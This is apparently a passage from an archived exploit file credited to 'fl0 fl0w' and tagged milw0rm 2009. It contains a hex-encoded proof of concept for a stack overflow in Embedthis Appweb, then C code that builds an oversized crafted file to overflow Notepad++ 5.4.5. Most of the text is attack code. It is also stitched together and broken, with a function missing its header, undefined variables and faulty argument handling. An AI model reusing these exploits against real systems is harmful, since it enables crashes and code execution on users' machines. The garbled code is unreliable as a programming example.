0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31,
0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28,
0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,
0x2C, 0x20, 0x22, 0x5C, 0x5C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65,
0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20,
0x68, 0x65, 0x5F, 0x61, 0x64, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x65,
0x5F, 0x61, 0x64, 0x29, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F,
0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28,
0x68, 0x65, 0x5F, 0x61, 0x64, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D,
0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B,
0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B,
0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63,
0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66,
0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31,
0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28,
0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,
0x2C, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28,
0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66,
0x28, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72,
0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29,
0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20,
0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E,
0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x68, 0x69, 0x74, 0x5B, 0x5D, 0x20, 0x3D, 0x7B, 0x20, 0x30,
0x78, 0x33, 0x43, 0x2C, 0x30, 0x78, 0x36, 0x39, 0x2C, 0x30, 0x78, 0x36, 0x44, 0x2C, 0x30, 0x78,
0x36, 0x37, 0x2C, 0x30, 0x78, 0x32, 0x30, 0x2C, 0x30, 0x78, 0x37, 0x33, 0x2C, 0x30, 0x78, 0x37,
0x32, 0x2C, 0x30, 0x78, 0x36, 0x33, 0x2C, 0x30, 0x78, 0x33, 0x44, 0x20, 0x7D, 0x3B, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D,
0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x73,
0x68, 0x69, 0x74, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x73, 0x68, 0x69, 0x74,
0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65,
0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x73, 0x68, 0x69, 0x74,
0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x73, 0x65, 0x74,
0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65,
0x74, 0x2C, 0x20, 0x30, 0x78, 0x32, 0x32, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x73, 0x65, 0x74, 0x28, 0x6D,
0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C,
0x20, 0x30, 0x78, 0x34, 0x31, 0x2C, 0x20, 0x34, 0x36, 0x31, 0x36, 0x29, 0x3B, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x34,
0x36, 0x31, 0x36, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x73,
0x65, 0x74, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66,
0x73, 0x65, 0x74, 0x2C, 0x20, 0x30, 0x78, 0x32, 0x32, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20,
0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79,
0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65,
0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65,
0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20,
0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75,
0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x5C, 0x5C,
0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66,
0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66,
0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79,
0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29, 0x29,
0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20,
0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29,
0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28,
0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,
0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D,
0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22,
0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75,
0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x5C, 0x5C,
0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66,
0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66,
0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C,
0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x29, 0x29,
0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,
0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C,
0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79,
0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65,
0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x20, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x32,
0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x77, 0x72, 0x69, 0x74, 0x65,
0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2C, 0x20, 0x6F, 0x66, 0x66, 0x73,
0x65, 0x74, 0x20, 0x2C, 0x20, 0x31, 0x2C, 0x20, 0x66, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x66, 0x77, 0x72, 0x69, 0x74, 0x65, 0x28, 0x22, 0x5C, 0x78, 0x30, 0x30,
0x22, 0x2C, 0x20, 0x31, 0x2C, 0x20, 0x31, 0x2C, 0x20, 0x66, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x22, 0x46, 0x69, 0x6C, 0x65,
0x20, 0x44, 0x6F, 0x6E, 0x65, 0x21, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,
0x20, 0x7D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x69,
0x6E, 0x28, 0x69, 0x6E, 0x74, 0x20, 0x61, 0x72, 0x67, 0x63, 0x2C, 0x20, 0x63, 0x68, 0x61, 0x72,
0x20, 0x2A, 0x61, 0x72, 0x67, 0x76, 0x5B, 0x5D, 0x29, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x7B,
0x20, 0x20, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2A, 0x66, 0x6E, 0x61, 0x6D, 0x65, 0x20, 0x3D, 0x20,
0x61, 0x72, 0x67, 0x76, 0x5B, 0x31, 0x5D, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x73, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x28, 0x22, 0x43, 0x4C, 0x53, 0x22, 0x29, 0x3B, 0x20,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66,
0x28, 0x73, 0x74, 0x64, 0x6F, 0x75, 0x74, 0x20, 0x2C, 0x20, 0x22, 0x3A, 0x3A, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3A, 0x3A, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x73, 0x74,
0x64, 0x6F, 0x75, 0x74, 0x20, 0x2C, 0x20, 0x22, 0x45, 0x6D, 0x62, 0x65, 0x64, 0x74, 0x68, 0x69,
0x73, 0x20, 0x41, 0x70, 0x70, 0x77, 0x65, 0x62, 0x20, 0x52, 0x65, 0x6D, 0x6F, 0x74, 0x65, 0x20,
0x53, 0x74, 0x61, 0x63, 0x6B, 0x20, 0x4F, 0x76, 0x65, 0x72, 0x66, 0x6C, 0x6F, 0x77, 0x20, 0x50,
0x4F, 0x43, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x73, 0x74, 0x64, 0x6F, 0x75, 0x74, 0x20,
0x2C, 0x20, 0x22, 0x41, 0x6C, 0x6C, 0x20, 0x43, 0x72, 0x65, 0x64, 0x69, 0x74, 0x73, 0x3A, 0x66,
0x6C, 0x30, 0x20, 0x66, 0x6C, 0x30, 0x77, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x73, 0x74, 0x64,
0x6F, 0x75, 0x74, 0x20, 0x2C, 0x20, 0x22, 0x3A, 0x3A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x3A, 0x3A, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x69, 0x66, 0x28, 0x61, 0x72, 0x67, 0x63, 0x20, 0x3C, 0x20, 0x32, 0x29, 0x20, 0x7B,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28,
0x22, 0x55, 0x73, 0x61, 0x67, 0x65, 0x20, 0x69, 0x73, 0x20, 0x25, 0x73, 0x20, 0x66, 0x69, 0x6C,
0x65, 0x6E, 0x61, 0x6D, 0x65, 0x2E, 0x68, 0x74, 0x6D, 0x6C, 0x5C, 0x6E, 0x22, 0x2C, 0x20, 0x61,
0x72, 0x67, 0x76, 0x5B, 0x30, 0x5D, 0x29, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x65, 0x78, 0x69, 0x74, 0x28, 0x2D, 0x31, 0x29, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x46, 0x62, 0x75, 0x69, 0x6C, 0x64, 0x28, 0x66,
0x6E, 0x61, 0x6D, 0x65, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x72,
0x65, 0x74, 0x75, 0x72, 0x6E, 0x20, 0x30, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,
0x7D, 0x20, 0x20, 0x0D, 0x0A,
} ;
size_t get_executable_path (char* buffer, size_t len)
{
char* path_end;
if (readlink ("/proc/self/exe", buffer, len) <= 0)
return -1;
path_end = strrchr (buffer, '/');
if (path_end == NULL)
return -1;
++path_end;
*path_end = '\0';
return (size_t) (path_end - buffer);
}
#define STRING_SIZE 0xF4240
#define S 0x64
char b[STRING_SIZE];
memset(b, 0x41, STRING_SIZE);
FILE *f;
f = fopen(fname, "wb");
int i;
for(i = 0; i < S; i++) {
fwrite(b, sizeof(char), STRING_SIZE, f); }
fwrite(V, sizeof(char), strlen(V), f);
checksum(b, STRING_SIZE);
char c[100];
get_executable_path (c, 100);
printf("FILE DONE !\n");
printf("path/location of the crafted file is: %s\n", c);
fclose(f);
}
void args(int argc, char *argv[])
{
int file;
int a;
if(a)
while((a = getopt(argc, argv, "f")) != EOF) {
switch(a) {
case 'f':
file = (int)optarg;
break;
default:
exit(-1);
}
}
}
void Usage(char *argv[])
{ printf("*************************************************\n");
printf("Notepad++ 5.4.5 Stack Buffer Overflow\n");
printf("Usage is:%s [option1] filename\n", argv[0]);
printf("CREDITS:fl0 fl0w\n");
printf("This POC is PRIVATE\n");
printf("*************************************************\n");
}
void Menu(char *argv[])
{ fprintf(stderr,
"\n"
"\t-f FILE.c/cpp\n"
"\n"
,
argv[0]);
exit(-1);
}
int main(int argc, char *argv[])
{ CLS(15);
if(argc < 2) {
Usage(argv);
printf("Example:\n");
Menu(argv[0]);
Usage(argv);
}
args(argc, argv);
Buildfile(argv[2]);
return 0;
}
// milw0rm.com [2009-09-16]
Reference in a new issue View git blame Copy permalink